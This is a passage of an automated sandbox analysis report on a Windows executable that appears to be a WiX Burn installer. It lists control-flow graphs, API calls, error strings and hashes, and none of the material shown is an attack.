                                                                                                                • TlsSetValue.KERNEL32(?,?), ref: 0024E7FF
                                                                                                                • RegisterClassW.USER32 ref: 0024E82B
                                                                                                                • GetLastError.KERNEL32 ref: 0024E836
                                                                                                                • CreateWindowExW.USER32 ref: 0024E89D
                                                                                                                • GetLastError.KERNEL32 ref: 0024E8A7
                                                                                                                • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0024E945
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                • API String ID: 213125376-288575659
                                                                                                                • Opcode ID: 1fb0f773761455d4a1843a379b64c2886e375e14e7c6e2c6527f5549019e0f24
                                                                                                                • Instruction ID: dda29f2b55b411893fc2b7c556c67941ef80a0eae64732fe4b9d4a77eb0f60a2
                                                                                                                • Opcode Fuzzy Hash: 1fb0f773761455d4a1843a379b64c2886e375e14e7c6e2c6527f5549019e0f24
                                                                                                                • Instruction Fuzzy Hash: AF41A372911225ABEF259FA0DC48BDEBFB8FF09750F154165F908AB190D7709DA08BA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1056 23c28f-23c2c1 1057 23c2c3-23c2e1 CreateFileW 1056->1057 1058 23c32b-23c347 GetCurrentProcess * 2 DuplicateHandle 1056->1058 1059 23c383-23c389 1057->1059 1060 23c2e7-23c2f1 GetLastError 1057->1060 1061 23c381 1058->1061 1062 23c349-23c353 GetLastError 1058->1062 1065 23c393 1059->1065 1066 23c38b-23c391 1059->1066 1063 23c2f3-23c2fc 1060->1063 1064 23c2fe 1060->1064 1061->1059 1067 23c360 1062->1067 1068 23c355-23c35e 1062->1068 1063->1064 1071 23c300 1064->1071 1072 23c305-23c318 call 233821 1064->1072 1073 23c395-23c3a3 SetFilePointerEx 1065->1073 1066->1073 1069 23c362 1067->1069 1070 23c367-23c37f call 233821 1067->1070 1068->1067 1069->1070 1085 23c31d-23c326 call 270237 1070->1085 1071->1072 1072->1085 1076 23c3a5-23c3af GetLastError 1073->1076 1077 23c3da-23c3e0 1073->1077 1082 23c3b1-23c3ba 1076->1082 1083 23c3bc 1076->1083 1078 23c3e2-23c3e6 call 251741 1077->1078 1079 23c3fe-23c404 1077->1079 1088 23c3eb-23c3ef 1078->1088 1082->1083 1086 23c3c3-23c3d8 call 233821 1083->1086 1087 23c3be 1083->1087 1085->1079 1094 23c3f6-23c3fd call 270237 1086->1094 1087->1086 1088->1079 1092 23c3f1 1088->1092 1092->1094 1094->1079
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0023C47F,00235405,?,?,00235445), ref: 0023C2D6
                                                                                                                • GetLastError.KERNEL32(?,0023C47F,00235405,?,?,00235445,00235445,00000000,?,00000000), ref: 0023C2E7
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0023C47F,00235405,?,?,00235445,00235445,00000000,?), ref: 0023C336
                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0023C47F,00235405,?,?,00235445,00235445,00000000,?,00000000), ref: 0023C33C
                                                                                                                • DuplicateHandle.KERNELBASE(00000000,?,0023C47F,00235405,?,?,00235445,00235445,00000000,?,00000000), ref: 0023C33F
                                                                                                                • GetLastError.KERNEL32(?,0023C47F,00235405,?,?,00235445,00235445,00000000,?,00000000), ref: 0023C349
                                                                                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0023C47F,00235405,?,?,00235445,00235445,00000000,?,00000000), ref: 0023C39B
                                                                                                                • GetLastError.KERNEL32(?,0023C47F,00235405,?,?,00235445,00235445,00000000,?,00000000), ref: 0023C3A5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                • API String ID: 2619879409-373955632
                                                                                                                • Opcode ID: cc4dfb46f36cd2ca31bb617b7bb1b6a1d60ae55a6b1c0e1c4099a75abffee3c2
                                                                                                                • Instruction ID: 5b814984a7f1cb863daa96289af883eb06b2b0370b8461368d9d2128f801d836
                                                                                                                • Opcode Fuzzy Hash: cc4dfb46f36cd2ca31bb617b7bb1b6a1d60ae55a6b1c0e1c4099a75abffee3c2
                                                                                                                • Instruction Fuzzy Hash: 4E41C4B6164202ABDB219F299D49F1B7BA5EB85720F318069FD18EB241DB71C821DB60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1097 272af7-272b17 call 233838 1100 272c21-272c25 1097->1100 1101 272b1d-272b2b call 274a6c 1097->1101 1103 272c27-272c2a call 275636 1100->1103 1104 272c2f-272c35 1100->1104 1105 272b30-272b4f GetProcAddress 1101->1105 1103->1104 1107 272b56-272b6f GetProcAddress 1105->1107 1108 272b51 1105->1108 1109 272b76-272b8f GetProcAddress 1107->1109 1110 272b71 1107->1110 1108->1107 1111 272b96-272baf GetProcAddress 1109->1111 1112 272b91 1109->1112 1110->1109 1113 272bb6-272bcf GetProcAddress 1111->1113 1114 272bb1 1111->1114 1112->1111 1115 272bd6-272bef GetProcAddress 1113->1115 1116 272bd1 1113->1116 1114->1113 1117 272bf6-272c10 GetProcAddress 1115->1117 1118 272bf1 1115->1118 1116->1115 1119 272c17 1117->1119 1120 272c12 1117->1120 1118->1117 1119->1100 1120->1119
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00233838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00233877
                                                                                                                  • Part of subcall function 00233838: GetLastError.KERNEL32 ref: 00233881
                                                                                                                  • Part of subcall function 00274A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00274A9D
                                                                                                                • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00272B41
                                                                                                                • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00272B61
                                                                                                                • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00272B81
                                                                                                                • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00272BA1
                                                                                                                • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00272BC1
                                                                                                                • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00272BE1
                                                                                                                • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00272C01
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                • API String ID: 2510051996-1735120554
                                                                                                                • Opcode ID: 4f902210448ed1ec3bb7a5b6172785b40e43d64d929460182a4eca1872e86b1b
                                                                                                                • Instruction ID: dc142747522afe8867eac19e0b97c82d2c2e99e5418424e514171c5e3eeeb5fa
                                                                                                                • Opcode Fuzzy Hash: 4f902210448ed1ec3bb7a5b6172785b40e43d64d929460182a4eca1872e86b1b
                                                                                                                • Instruction Fuzzy Hash: D431E0B1920209EADF039F61FE4EB6A7BACF719B48F00412BE40856560E7B528659F50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1121 27304f-273073 GetModuleHandleA 1122 273075-27307f GetLastError 1121->1122 1123 2730a8-2730b9 GetProcAddress 1121->1123 1126 273081-27308a 1122->1126 1127 27308c 1122->1127 1124 2730fc 1123->1124 1125 2730bb-2730df GetProcAddress * 3 1123->1125 1130 2730fe-27311b CoCreateInstance 1124->1130 1128 2730e1-2730e3 1125->1128 1129 2730f8-2730fa 1125->1129 1126->1127 1131 273093-2730a3 call 233821 1127->1131 1132 27308e 1127->1132 1128->1129 1134 2730e5-2730e7 1128->1134 1129->1130 1135 2731b1-2731b3 1130->1135 1136 273121-273123 1130->1136 1144 2731c7-2731cc 1131->1144 1132->1131 1134->1129 1140 2730e9-2730f6 1134->1140 1137 2731c6 1135->1137 1138 2731b5-2731bc 1135->1138 1141 273128-273138 1136->1141 1137->1144 1138->1137 1152 2731be-2731c0 ExitProcess 1138->1152 1140->1130 1142 273142 1141->1142 1143 27313a-27313e 1141->1143 1147 273144-273154 1142->1147 1143->1141 1145 273140 1143->1145 1148 2731d4-2731d9 1144->1148 1149 2731ce-2731d0 1144->1149 1151 27315c 1145->1151 1153 273166-27316a 1147->1153 1154 273156-27315a 1147->1154 1155 2731e1-2731e8 1148->1155 1156 2731db-2731dd 1148->1156 1149->1148 1151->1153 1157 273195-2731a6 1153->1157 1158 27316c-27317f call 2731eb 1153->1158 1154->1147 1154->1151 1156->1155 1157->1135 1161 2731a8-2731af 1157->1161 1158->1135 1163 273181-273193 1158->1163 1161->1135 1163->1135 1163->1157
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00273609,00000000,?,00000000), ref: 00273069
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0025C025,?,00235405,?,00000000,?), ref: 00273075
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 002730B5
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002730C1
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 002730CC
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002730D6
                                                                                                                • CoCreateInstance.OLE32(0029B6B8,00000000,00000001,0027B818,?,?,?,?,?,?,?,?,?,?,?,0025C025), ref: 00273111
                                                                                                                • ExitProcess.KERNEL32 ref: 002731C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                • API String ID: 2124981135-499589564
                                                                                                                • Opcode ID: c4df5f1a854ead41706adc780e2a8ae17b05399751e50a3e75f7235f93728bc0
                                                                                                                • Instruction ID: 40e7f190f98b9c0d5181abd303f8517c335686d87a5331a3df1f8d3991c5efac
                                                                                                                • Opcode Fuzzy Hash: c4df5f1a854ead41706adc780e2a8ae17b05399751e50a3e75f7235f93728bc0
                                                                                                                • Instruction Fuzzy Hash: 0B41B531A21216ABDF25DFA8C849BAEB7B8EF45710F118168E90DE7240D771DE609B90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1165 26fcae-26fcc9 call 233824 1168 26fcf1 1165->1168 1169 26fccb-26fcef GetProcAddress * 2 1165->1169 1170 26fcf6-26fcfd 1168->1170 1169->1170 1171 26fd07-26fd1a call 233824 1170->1171 1172 26fcff-26fd01 1170->1172 1176 26fdb8-26fdbc 1171->1176 1177 26fd20-26fd39 GetProcAddress 1171->1177 1172->1171 1173 26fdae 1172->1173 1173->1176 1178 26fd6c-26fd85 GetProcAddress 1177->1178 1179 26fd3b-26fd3d 1177->1179 1178->1173 1181 26fd87-26fd89 1178->1181 1179->1178 1180 26fd3f-26fd49 GetLastError 1179->1180 1182 26fd56 1180->1182 1183 26fd4b-26fd54 1180->1183 1181->1173 1184 26fd8b-26fd95 GetLastError 1181->1184 1187 26fd5d-26fd5e 1182->1187 1188 26fd58 1182->1188 1183->1182 1185 26fd97-26fda0 1184->1185 1186 26fda2 1184->1186 1185->1186 1189 26fda4 1186->1189 1190 26fda9-26fdac 1186->1190 1191 26fd60-26fd6a call 233821 1187->1191 1188->1187 1189->1190 1190->1191 1191->1176
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0026FCD6
                                                                                                                • GetProcAddress.KERNEL32(SystemFunction041), ref: 0026FCE8
                                                                                                                • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0026FD2B
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0026FD3F
                                                                                                                • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0026FD77
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0026FD8B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast
                                                                                                                • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+?s$cryputil.cpp
                                                                                                                • API String ID: 4214558900-776468437
                                                                                                                • Opcode ID: 77a417c48593e3bf463d1e47393cdd53d86cd0a4c85f5f017394e3cb3ad60839
                                                                                                                • Instruction ID: 75d827c2a2ab73aebd20cf89d49ef12ac6c1c6f5b604fb62902adaa24ebf87d8
                                                                                                                • Opcode Fuzzy Hash: 77a417c48593e3bf463d1e47393cdd53d86cd0a4c85f5f017394e3cb3ad60839
                                                                                                                • Instruction Fuzzy Hash: 3F219276971332ABDF729B65BF0DB166990AB41F90F530136EC04AA160E760ACA0CAD4
                                                                                                                APIs
                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0023C3EB,?,00000000,?,0023C47F), ref: 00251778
                                                                                                                • GetLastError.KERNEL32(?,0023C3EB,?,00000000,?,0023C47F,00235405,?,?,00235445,00235445,00000000,?,00000000), ref: 00251781
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorEventLast
                                                                                                                • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                • API String ID: 545576003-938279966
                                                                                                                • Opcode ID: 130cd60804d1a28c8ffd8bd75d136cae32a8b01d3ee076c10ac319a134d223e5
                                                                                                                • Instruction ID: 7e9f632817bbf723008fe6116348fc526ce086b27f3fd50d09ae814654c036f3
                                                                                                                • Opcode Fuzzy Hash: 130cd60804d1a28c8ffd8bd75d136cae32a8b01d3ee076c10ac319a134d223e5
                                                                                                                • Instruction Fuzzy Hash: 40210A77D7163776F33126A95C4AF17A55CEB05761B020222FD14BB181EB70DC3486E5
                                                                                                                APIs
                                                                                                                • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 002508F2
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0025090A
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0025090F
                                                                                                                • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00250912
                                                                                                                • GetLastError.KERNEL32(?,?), ref: 0025091C
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0025098B
                                                                                                                • GetLastError.KERNEL32(?,?), ref: 00250998
                                                                                                                Strings
                                                                                                                • Failed to open cabinet file: %hs, xrefs: 002509C9
                                                                                                                • Failed to duplicate handle to cab container., xrefs: 0025094A
                                                                                                                • Failed to add virtual file pointer for cab container., xrefs: 00250971
                                                                                                                • cabextract.cpp, xrefs: 00250940, 002509BC
                                                                                                                • <the>.cab, xrefs: 002508EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                • API String ID: 3030546534-3446344238
                                                                                                                • Opcode ID: c21034ee7c2331b519b4413677075ba1b3e1e08bfd6e2c86d45ec5e3a2c09ddd
                                                                                                                • Instruction ID: e24b5c47da52b8b93f1df7e1562a60380775d723e0eae4f38aa38472c7df6015
                                                                                                                • Opcode Fuzzy Hash: c21034ee7c2331b519b4413677075ba1b3e1e08bfd6e2c86d45ec5e3a2c09ddd
                                                                                                                • Instruction Fuzzy Hash: 7F310636962236BBEB215B559C89F9EBA68EF05B61F114112FD08B7181D730AD20CBE4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00243AA6: RegCloseKey.ADVAPI32(00000000), ref: 00243B42
                                                                                                                • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00234B12,?,?,0027B488,?,00000001,00000000,00000000), ref: 0024404C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseSleep
                                                                                                                • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                • API String ID: 2834455192-2673269691
                                                                                                                • Opcode ID: 01418822028f0f48924b4d461857a3190caf3a952c47571fb5d45ab29da01350
                                                                                                                • Instruction ID: aa96ed385f2efcdc14c8b20d5913de2899c88d08a32f898aa7db41847d3dae5d
                                                                                                                • Opcode Fuzzy Hash: 01418822028f0f48924b4d461857a3190caf3a952c47571fb5d45ab29da01350
                                                                                                                • Instruction Fuzzy Hash: FE61A2B1A30616AAEB1DFF64CC42B6677A8EF11740F054155FD09EB181EBB0EDB08B90
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00000001,?,00000000,00235445,00000006,?,002382B9,?,?,?,00000000,00000000,00000001), ref: 00236DC8
                                                                                                                  • Part of subcall function 002356A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00236595,00236595,?,0023563D,?,?,00000000), ref: 002356E5
                                                                                                                  • Part of subcall function 002356A9: GetLastError.KERNEL32(?,0023563D,?,?,00000000,?,?,00236595,?,00237F02,?,?,?,?,?), ref: 00235714
                                                                                                                • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,002382B9), ref: 00236F59
                                                                                                                Strings
                                                                                                                • Attempt to set built-in variable value: %ls, xrefs: 00236E56
                                                                                                                • Unsetting variable '%ls', xrefs: 00236F15
                                                                                                                • Failed to set value of variable: %ls, xrefs: 00236F41
                                                                                                                • Setting string variable '%ls' to value '%ls', xrefs: 00236EED
                                                                                                                • Failed to insert variable '%ls'., xrefs: 00236E0D
                                                                                                                • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00236F6B
                                                                                                                • Setting hidden variable '%ls', xrefs: 00236E86
                                                                                                                • Failed to find variable value '%ls'., xrefs: 00236DE3
                                                                                                                • Setting numeric variable '%ls' to value %lld, xrefs: 00236EFA
                                                                                                                • variable.cpp, xrefs: 00236E4B
                                                                                                                • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00236ED0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                • API String ID: 2716280545-445000439
                                                                                                                • Opcode ID: 0dec1988470f556bc714d003ea58b7899ef00354a76e7efa47528d94096a1631
                                                                                                                • Instruction ID: 3701c51b9c332583e2f78cb258733af83702ee3a6ce791c616cd78ae6582d13c
                                                                                                                • Opcode Fuzzy Hash: 0dec1988470f556bc714d003ea58b7899ef00354a76e7efa47528d94096a1631
                                                                                                                • Instruction Fuzzy Hash: 1751E3B1A20226B7DB349E15DC4EF6B7BACEB56711F20C119F80956282C3B1D871CAE1
                                                                                                                APIs
                                                                                                                • IsWindow.USER32 ref: 00234C64
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00234C75
                                                                                                                Strings
                                                                                                                • Failed to check global conditions, xrefs: 00234B49
                                                                                                                • Failed to set layout directory variable to value provided from command-line., xrefs: 00234C06
                                                                                                                • Failed to query registration., xrefs: 00234BAE
                                                                                                                • Failed to set action variables., xrefs: 00234BC4
                                                                                                                • Failed while running , xrefs: 00234C2A
                                                                                                                • WixBundleLayoutDirectory, xrefs: 00234BF5
                                                                                                                • Failed to set registration variables., xrefs: 00234BDE
                                                                                                                • Failed to open log., xrefs: 00234B18
                                                                                                                • Failed to create the message window., xrefs: 00234B98
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostWindow
                                                                                                                • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                • API String ID: 3618638489-3051724725
                                                                                                                • Opcode ID: 3952125f2af3db68bed23ca2fe0ee1582c0cad4c19de1b850174c800bc09e941
                                                                                                                • Instruction ID: 1c3a93801328d7db4408503b6a81be3bc8e9d80965731973ce2258a5a6bdaa5d
                                                                                                                • Opcode Fuzzy Hash: 3952125f2af3db68bed23ca2fe0ee1582c0cad4c19de1b850174c800bc09e941
                                                                                                                • Instruction Fuzzy Hash: 1341E5B1A3162BBBDB2B7A20CC45FAAB66CFF01754F005696B80496150DBB0FC709AD0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002333C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,002310DD,?,00000000), ref: 002333E8
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 002310F6
